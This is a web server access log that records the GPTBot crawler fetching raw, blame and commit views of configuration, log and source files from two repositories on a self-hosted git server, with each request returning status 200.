git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/letsencrypt/renewal/npm-4.conf" [Client 74.7.227.38] [Length 696] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/letsencrypt/renewal/npm-4.conf" +[17/Feb/2026:13:23:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/letsencrypt/renewal/npm-1.conf" [Client 74.7.227.38] [Length 695] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/letsencrypt/renewal/npm-1.conf" +[17/Feb/2026:13:23:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/letsencrypt/renewal/npm-2.conf" [Client 74.7.227.38] [Length 697] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/letsencrypt/renewal/npm-2.conf" +[17/Feb/2026:13:23:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm" [Client 74.7.227.38] [Length 10503] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project" +[17/Feb/2026:13:23:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/docker-compose.yml" [Client 74.7.227.38] [Length 10529] [Gzip 3.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/docker-compose.yml" +[17/Feb/2026:13:23:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/docker-compose.yml" [Client 74.7.227.38] [Length 13571] [Gzip 6.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/docker-compose.yml" +[17/Feb/2026:13:23:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/docker-compose.yml" [Client 74.7.227.38] [Length 1058] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/docker-compose.yml" +[17/Feb/2026:13:23:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt-requests_error.log" [Client 74.7.227.38] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt-requests_error.log" +[17/Feb/2026:13:23:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp" [Client 74.7.227.38] [Length 10858] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm" +[17/Feb/2026:13:23:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt-requests_access.log" [Client 74.7.227.38] [Length 5722] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt-requests_access.log" +[17/Feb/2026:13:23:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components" [Client 74.7.227.38] [Length 9879] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components" +[17/Feb/2026:13:23:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/mail_contact.py" [Client 74.7.227.38] [Length 16081] [Gzip 5.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d" +[17/Feb/2026:13:23:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/update_status.py" [Client 74.7.227.38] [Length 12956] [Gzip 3.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d" +[17/Feb/2026:13:23:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt-requests_error.log" [Client 74.7.227.38] [Length 10940] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs" +[17/Feb/2026:13:23:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp" [Client 74.7.227.38] [Length 10858] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm" +[17/Feb/2026:13:23:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt-requests_access.log" [Client 74.7.227.38] [Length 12178] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs" +[17/Feb/2026:13:23:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/docker-compose.yml" [Client 74.7.227.38] [Length 11108] [Gzip 4.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/docker-compose.yml" +[17/Feb/2026:13:23:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/docker-compose.yml" [Client 74.7.227.38] [Length 12522] [Gzip 5.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/docker-compose.yml" +[17/Feb/2026:13:23:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/docker-compose.yml" [Client 74.7.227.38] [Length 12845] [Gzip 5.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/docker-compose.yml" +[17/Feb/2026:13:23:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt-requests_access.log" [Client 74.7.227.38] [Length 12149] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs" +[17/Feb/2026:13:23:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt-requests_error.log" [Client 74.7.227.38] [Length 10970] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs" +[17/Feb/2026:13:23:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/.gitignore" [Client 74.7.227.38] [Length 10757] [Gzip 4.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/.gitignore" +[17/Feb/2026:13:23:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/mail_contact.py" [Client 74.7.227.38] [Length 10144] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/mail_contact.py" +[17/Feb/2026:13:23:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/update_status.py" [Client 74.7.227.38] [Length 9877] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/update_status.py" +[17/Feb/2026:13:23:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/update_status.py" [Client 74.7.227.38] [Length 1390] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/update_status.py" +[17/Feb/2026:13:23:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/mail_contact.py" [Client 74.7.227.38] [Length 3922] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/mail_contact.py" +[17/Feb/2026:13:23:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt-requests_error.log" [Client 74.7.227.38] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt-requests_error.log" +[17/Feb/2026:13:23:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/docker-compose.yml" [Client 74.7.227.38] [Length 9869] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/docker-compose.yml" +[17/Feb/2026:13:23:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/docker-compose.yml" [Client 74.7.227.38] [Length 10128] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/docker-compose.yml" +[17/Feb/2026:13:23:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/docker-compose.yml" [Client 74.7.227.38] [Length 10341] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/docker-compose.yml" +[17/Feb/2026:13:23:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt-requests_access.log" [Client 74.7.227.38] [Length 5722] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt-requests_access.log" +[17/Feb/2026:13:23:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt-requests_error.log" [Client 74.7.227.38] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt-requests_error.log" +[17/Feb/2026:13:23:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt-requests_access.log" [Client 74.7.227.38] [Length 5722] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt-requests_access.log" +[17/Feb/2026:13:23:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/index.tsx" [Client 74.7.227.38] [Length 10857] [Gzip 3.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/index.tsx" +[17/Feb/2026:13:23:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project" [Client 74.7.227.38] [Length 10390] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977" +[17/Feb/2026:13:23:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/Hero.tsx" [Client 74.7.227.38] [Length 13868] [Gzip 3.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components" +[17/Feb/2026:13:23:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt/renewal/npm-4.conf" [Client 74.7.227.38] [Length 11708] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt/renewal" +[17/Feb/2026:13:23:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.3" [Client 74.7.227.38] [Length 51469] [Gzip 13.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.3" +[17/Feb/2026:13:24:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt/renewal/npm-2.conf" [Client 74.7.227.38] [Length 11702] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt/renewal" +[17/Feb/2026:13:24:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.5" [Client 74.7.227.38] [Length 42202] [Gzip 12.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.5" +[17/Feb/2026:13:24:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt/renewal/npm-1.conf" [Client 74.7.227.38] [Length 11711] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt/renewal" +[17/Feb/2026:13:24:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.2" [Client 74.7.227.38] [Length 39565] [Gzip 13.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.2" +[17/Feb/2026:13:24:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.1" [Client 74.7.227.38] [Length 42032] [Gzip 12.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.1" +[17/Feb/2026:13:24:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.6" [Client 74.7.227.38] [Length 44608] [Gzip 12.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.6" +[17/Feb/2026:13:24:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt/renewal/npm-1.conf" [Client 74.7.227.38] [Length 11681] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt/renewal" +[17/Feb/2026:13:24:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project" [Client 74.7.227.38] [Length 10104] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project" +[17/Feb/2026:13:24:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/Hero.tsx" [Client 74.7.227.38] [Length 13653] [Gzip 5.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/Hero.tsx" +[17/Feb/2026:13:24:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt/renewal/npm-4.conf" [Client 74.7.227.38] [Length 696] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt/renewal/npm-4.conf" +[17/Feb/2026:13:24:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.2" [Client 74.7.227.38] [Length 39539] [Gzip 13.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.2" +[17/Feb/2026:13:24:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt/renewal/npm-2.conf" [Client 74.7.227.38] [Length 697] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt/renewal/npm-2.conf" +[17/Feb/2026:13:24:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.3" [Client 74.7.227.38] [Length 51492] [Gzip 13.64] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.3" +[17/Feb/2026:13:24:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt/renewal/npm-7.conf" [Client 74.7.227.38] [Length 11654] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt/renewal" +[17/Feb/2026:13:24:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt/renewal/npm-4.conf" [Client 74.7.227.38] [Length 11680] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt/renewal" +[17/Feb/2026:13:24:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.1" [Client 74.7.227.38] [Length 42004] [Gzip 12.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 